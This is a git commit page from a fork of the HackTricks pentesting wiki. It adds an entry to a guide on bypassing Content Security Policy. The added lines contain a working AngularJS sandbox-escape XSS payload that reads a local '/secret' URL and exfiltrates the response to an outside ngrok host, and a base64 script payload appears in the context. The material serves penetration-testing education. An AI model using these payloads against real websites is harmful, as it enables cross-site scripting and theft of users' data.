coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

GitBook: [master] one page modified

Browse Source
This commit is contained in:
CPol 2021-04-20 22:24:21 +00:00 committed by gitbook-bot
parent 7410f8b79e
commit 1a94e081a3
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 7 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
pentesting-web/content-security-policy-csp-bypass.md
View File

@ -95,6 +95,13 @@ report-uri /Report-parsing-url;
Working payload: `<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>`
### 'unsafe-eval' + JS CDN
```markup
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };var z=new XMLHttpRequest();z.onreadystatechange=function(){if (z.responseText) location="http://af4255a9ed70.ngrok.io?a="+btoa(unescape(encodeURIComponent(z.responseText)))};z.open("GET","http://127.0.0.1/secret",false);z.send();//');}} </div>
```
### Wildcard
```text